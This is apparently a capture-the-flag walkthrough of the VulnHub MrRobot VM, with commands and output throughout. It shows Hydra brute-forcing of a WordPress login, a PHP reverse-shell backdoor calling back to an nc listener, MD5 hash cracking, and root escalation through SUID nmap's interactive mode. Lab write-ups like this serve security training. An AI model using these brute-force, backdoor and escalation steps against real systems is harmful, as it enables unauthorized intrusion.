Sec-Art: MrRobot CTF VM WalkThrough from VulnHub

VM : MrRobot

Download Link : https://www.vulnhub.com/entry/basic-pentesting-2,241/

Getting Target machine IP :

Scan the whole network to identify the target IP.

 nmap -sP 192.168.56.0/24

-sP sends ICMP echo request and only tells if host is up or down. Our target system is 192.168.56.101.

Scanning the target

 $ nmap -sV 192.168.56.101 -oN target.scan
 
         STATE  SERVICE  VERSION
 22/tcp  closed ssh
 80/tcp  open   http     Apache httpd
 443/tcp open   ssl/http Apache httpd

There are only two ports open.

-oN stores the output in a normal file(target.scan), theres also various format available.

At port 80 the web page is available, but theres nothing any interesting data.

Scanning the target web server for hiden urls and other stuffs

 $ dirb http://192.168.56.101 -o dirb.scan

It seem there have some problem on scanning(because i am running attacker machine on docker container), so i need to use -w option to ignore the warning.

 $ dirb http://192.168.56.101 -o dirb.scan

Scanning for wordpress website :

 $ wpscan --url http://192.168.56.101

Some of the important findings are :

 ttp://192.168.56.101/0/
 http://192.168.56.101/admin/
 http://192.168.56.101/robots.txt
 .......

where at http://192.168.56.101/0/ a wordpress website is hosted.

Now the robots.txt file have some interested things, so first download it.

 $ wget http://192.168.56.101/robots.txt
 --2019-11-13 15:52:46--  http://192.168.56.101/robots.txt
 Connecting to 192.168.56.101:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 41 [text/plain]
 Saving to: 'robots.txt'
 
 robots.txt           100%[========================>]      41  --.-KB/s    in 0s
 
 2019-11-13 15:52:46 (4.69 MB/s) - 'robots.txt' saved [41/41]
 
 $ cat robots.txt
 User-agent: *
 fsocity.dic
 key-1-of-3.txt

As we can see that we find our first key and a another file fsocity.dic, now download it.

 $ wget http://192.168.56.101/key-1-of-3.txt
 $ cat key-1-of-3.txt
 1f80d943455fb30724b9

It contains the flag value. Now lets check another file.

 $ wget http://192.168.56.101/fsocity.dic

This file contains the list of 858160 words.

 wc -l fsocity.dic

Now let sort the file and remove duplicates

 $ cat fsocity.dic | sort | uniq > fsocity_sorted.dic

Now the file length is 11451. This list can be login for the wordpress website. So try to bruteforce the wordpress login with this list. First we bruteforce the username field then password field. For bruteforec we are going to use hydra.

BruteForcing WordPress Login with Hydra :

For basics use hydra refer to this : http://www.sec-art.net/hydra

Bruteforcing username:

 $ hydra -vV -L fsocity_sorted.dic -p randompass 192.168.56.101 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username" -o success

Where -o success option is used to store result working keys. Contents of success file :

 [80][http-post-form] host: 192.168.56.101   login: ELLIOT   password: randompass
 [80][http-post-form] host: 192.168.56.101   login: Elliot   password: randompass
 [80][http-post-form] host: 192.168.56.101   login: elliot   password: randompa

the username is found, then we can bruteforce the password file with same list.

 $ hydra -vV -l elliot -P fsocity_sorted.dic 192.168.56.101 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect"

Password fount : ER28-0652

We can also use wpscan, for example :

 $ wpscan --url http://192.168.56.101/wp-login.php --usernames elliot --passwords fsocity_sorted.dic --wp-content-dir "http://192.168.56.101/wp-login.php"

Droping Backdoor on Wordpress :

First login to wordpress with above credentials and go to Appearance > Editor

Get the php reverse shell code from : Click here to download

Change the IP on script to your attacker machine and port number then put it on the Main Index page

Now start backdoor listener

 $ nc -vvlp 1234

and open wordpress index file.

 ajay@MBot:~$ nc -vvlp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from 192.168.56.101 47906 received!
 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  00:13:18 up  3:57,  0 users,  load average: 0.00, 0.08, 0.46
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 /bin/sh: 0: can't access tty; job control turned off
 $

In the /home/robot folder we found 2nd key file, currently we don't have the permission to open it.

 $ cd home/robot
 $ ls
 key-2-of-3.txt
 password.raw-md5
 $ cat key-2-of-3.txt
 cat: key-2-of-3.txt: Permission denied
 $ whoami
 daemon

But we the permission to read password.raw-md5 file

 $ cat password.raw-md5
 robot:c3fcd3d76192e4007dfb496cca67e13b

which looks like md5 unslated password hash. Now to crack that we can use JTR(John the ripper) or john password cracking tool.

 $ cat passhash.txt
 c3fcd3d76192e4007dfb496cca67e13b
 
 $ john passhash.txt

But it takes time,so we can also use online hash cracking service from crackstation.net

So the password is :

 abcdefghijklmnopqrstuvwxyz

Now lets try to login as robot with above password

 $ sudo robot
 sudo: no tty present and no askpass program specified
 $ python -c 'import pty; pty.spawn("/bin/bash")'  
 daemon@linux:/home/robot$ su robot
 su robot
 Password: abcdefghijklmnopqrstuvwxyz
 
 robot@linux:~$ cat key-2-of-3.txt
 cat key-2-of-3.txt
 822c73956184f694993bede3eb39f959
 robot@linux:~$

We can get 2nd flag also. Note that the python -c 'import pty; pty.spawn("/bin/bash")' is used to spawn a tty shell.

Privilege Escalation to root :

There are various methods for privilege escalation, which can be found here : Link (Click Here)

For this VM first we try to find a binary with SUID root.

 $ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
 
 -rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
 -rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount
 -rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount
 -rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
 -rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su
 -rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd
 -rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp
 -rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh
 -rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn
 -rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd
 -rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo
 -rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap
 -rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign
 -rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
 -r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
 -r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 -rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown

At above we use find commands which finds files with SUID and then -exec options will run ls -ld command on the file, 2>/dev/null will redirect all the errors.

Now there is an interesting finding :

 -rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap

Now there is a method to get root shell with nmap (if it support --interactive option`), which can be found on this article : https://www.exploit-db.com/papers/18168/

Now get a root shell with nmap

 $ nmap --interactive
 
 Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
 Welcome to Interactive Mode -- press h <enter> for help
 nmap> !sh
 !sh
 # whoami
 whoami
 root
 #

!! We get a root shell. Now lets find 3rd key.

 # cd /root
 cd /root
 # ls
 ls
 firstboot_done key-3-of-3.txt
 # cat key-3-of-3.txt
 cat key-3-of-3.txt
 04787ddef27c3dee1ee161b21670b4e4

Thats it. !!!

We found all the keys.